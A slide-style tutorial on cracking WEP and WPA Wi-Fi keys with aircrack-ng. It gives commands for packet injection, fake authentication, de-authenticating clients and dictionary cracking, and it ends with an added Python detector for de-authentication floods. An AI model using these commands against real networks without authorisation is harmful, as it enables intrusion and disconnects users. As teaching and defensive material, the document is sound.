Wireless Cracking
By: Christopher Zacky

aircrack-ng Suite
http://www.aircrack-ng.org
- airodump-ng: capture packets
- airmon-ng: put your wireless card into monitor mode (I just use iwconfig for this)
- aireplay-ng: do fake authentications, ARP replay requests, de-authenticate other clients
- aircrack-ng: crack the key

WEP and WPA
- WEP key... relatively easy to crack
  - Don't use WEP, wtf is wrong with you
  - ARP replay request
- WPA key... not as easy, but still possible, especially if your password is lame
  - You need to capture a handshake
  - Can only be done with brute force, which is a dictionary-based attack

What do you need?
- aircrack-ng
  - It's free and open source
  - Some Linux distributions come with it installed (like BackTrack or Pentoo)
- Wireless card
  - Needs to be able to go into monitor mode (sometimes Windows has a problem with that)
  - Needs to be capable of wireless injection
  - Just because you are close enough to receive wireless packets does not mean you are close enough to send them

WEP Crack - Concepts
http://www.aircrack-ng.org/doku.php?id=simple_wep_crack
- Uses tens of thousands of initialization vectors (IVs)
- The process is sped up through injection
- aircrack-ng runs an algorithm on the captured IVs to crack the key

WEP Crack - Overview
1. Find the ESSID, channel, and MAC address of the access point using airodump-ng
2. Put the wireless card in monitor mode and begin listening on the correct channel; you will be recording packets into a file
3. Do a fake authentication with the access point
4. Put aireplay-ng in ARP replay request mode
5. Capture lots of packets (I wait till I have 100,000)
6. Run aircrack-ng and crack the key!

airodump-ng
    airodump-ng <device_name>
    airodump-ng wlan0
- Write down the ESSID, channel, and MAC address
- Using screen helps a lot
- Also, use ifconfig and write down your wireless card's MAC address... you'll need it later

Monitor Mode
- Some people use airmon-ng... I don't
- You need to be on the right channel before you start capturing packets
- I use iwconfig; use airodump-ng to find the right channel
- Managed mode = regular mode
- Monitor mode = what we want for WEP cracking
- iwconfig to change the channel, ifconfig to turn the interface on/off

Enabling Monitor Mode on the Right Channel
    ifconfig wlan0 down
    iwconfig wlan0 mode managed
    ifconfig wlan0 up
    iwconfig wlan0 channel 6
    ifconfig wlan0 down
    iwconfig wlan0 mode monitor
    ifconfig wlan0 up

The commands (WEP)
Start capturing packets (-w names the capture file; --bssid takes the access point's MAC address):
    airodump-ng -c <channel> --bssid <bssid> -w <file_name> <device_name>
Do a fake authentication:
    aireplay-ng -1 0 -e <essid> -a <bssid> -h <my_mac_address> <device_name>
Begin packet injection (ARP replay request mode):
    aireplay-ng -3 -b <bssid> -h <my_mac_address> <device_name>
Crack the WEP key:
    aircrack-ng <file_name>

WPA Crack - Overview
- Can only be done via brute force
- You need to capture a handshake
  - Wait for someone to connect, or
  - Find someone who is connected and de-auth them
- Run the captured handshake against a dictionary
- You will only crack the key if it is in the dictionary you are using

WPA crack
Start capturing packets:
    airodump-ng -c <channel> --bssid <bssid> -w <file_name> <device_name>
De-authenticate the client:
    aireplay-ng -0 1 -a <bssid> -c <client_mac_address> <device_name>
Crack the WPA key:
    aircrack-ng -w <password_list> -b <bssid> <file_name>
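The WPA handshake capture above depends on de-authentication frames, which are unauthenticated 802.11 management frames and therefore visible to anyone monitoring the channel. The following is an added example, not part of the original slides or of the aircrack-ng project: it parses the 802.11 MAC header of each frame in a sample capture, picks out deauthentication and disassociation frames, and flags any transmitter address that sends more of them than a threshold, which is the basic check a wireless IDS performs. The frames, MAC addresses, threshold and reason codes are constructed for the demo.

```python
"""Detect de-authentication floods in 802.11 management frames.

Added example (not from the original slides). The sample frames are
constructed here; they are not captured traffic.
"""
import struct
from collections import Counter

# Frame control field values from IEEE 802.11: type 0 = management,
# subtype 8 = beacon, 10 = disassociation, 12 = de-authentication.
TYPE_MGMT = 0
SUBTYPE_BEACON = 8
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12


def build_frame(ftype, subtype, addr1, addr2, addr3, body=b""):
    """Build a minimal 3-address 802.11 frame (24-byte header + body).
    Used only to construct the sample input for this example."""
    fc0 = (subtype << 4) | (ftype << 2)  # protocol version 0, flags 0
    header = struct.pack("<BBH", fc0, 0, 0)  # frame control, duration
    for addr in (addr1, addr2, addr3):
        header += bytes.fromhex(addr.replace(":", ""))
    header += struct.pack("<H", 0)  # sequence control
    return header + body


def parse_frame(frame):
    """Decode type, subtype and the three addresses of an 802.11 frame.
    Returns None for anything shorter than a full 3-address header."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    return {
        "type": (fc0 >> 2) & 0x3,
        "subtype": (fc0 >> 4) & 0xF,
        "receiver": mac(frame[4:10]),
        "transmitter": mac(frame[10:16]),
        "bssid": mac(frame[16:22]),
        "body": frame[24:],
    }


def deauth_reason(parsed):
    """Reason code carried in the 2-byte body of a deauth/disassoc frame."""
    body = parsed["body"]
    if len(body) < 2:
        return None
    return struct.unpack("<H", body[:2])[0]


def find_deauth_flood(frames, threshold=3):
    """Count deauth/disassoc frames per transmitter address and return
    {transmitter: count} for those at or above the threshold."""
    counts = Counter()
    for raw in frames:
        p = parse_frame(raw)
        if p is None or p["type"] != TYPE_MGMT:
            continue
        if p["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            counts[p["transmitter"]] += 1
    return {tx: n for tx, n in counts.items() if n >= threshold}


# Constructed sample capture: one beacon from the AP, a burst of deauth
# frames carrying the AP's address as transmitter and aimed at one client
# (reason code 7 = class 3 frame from non-associated station), and one
# ordinary deauth from the client itself (reason code 3 = station leaving).
AP = "00:11:22:33:44:55"          # constructed
CLIENT = "66:77:88:99:aa:bb"      # constructed
BROADCAST = "ff:ff:ff:ff:ff:ff"
SAMPLE_FRAMES = [build_frame(TYPE_MGMT, SUBTYPE_BEACON, BROADCAST, AP, AP)]
SAMPLE_FRAMES += [
    build_frame(TYPE_MGMT, SUBTYPE_DEAUTH, CLIENT, AP, AP, struct.pack("<H", 7))
    for _ in range(5)
]
SAMPLE_FRAMES.append(
    build_frame(TYPE_MGMT, SUBTYPE_DEAUTH, AP, CLIENT, AP, struct.pack("<H", 3))
)

if __name__ == "__main__":
    for tx, n in find_deauth_flood(SAMPLE_FRAMES).items():
        print(f"possible deauth flood: {n} frames with transmitter {tx}")
```

The transmitter address in a flood is usually spoofed to look like the access point, so the alert identifies the victim BSSID rather than the real sender; the fix on the network side is enabling 802.11w (protected management frames), which makes clients discard unauthenticated de-authentication frames.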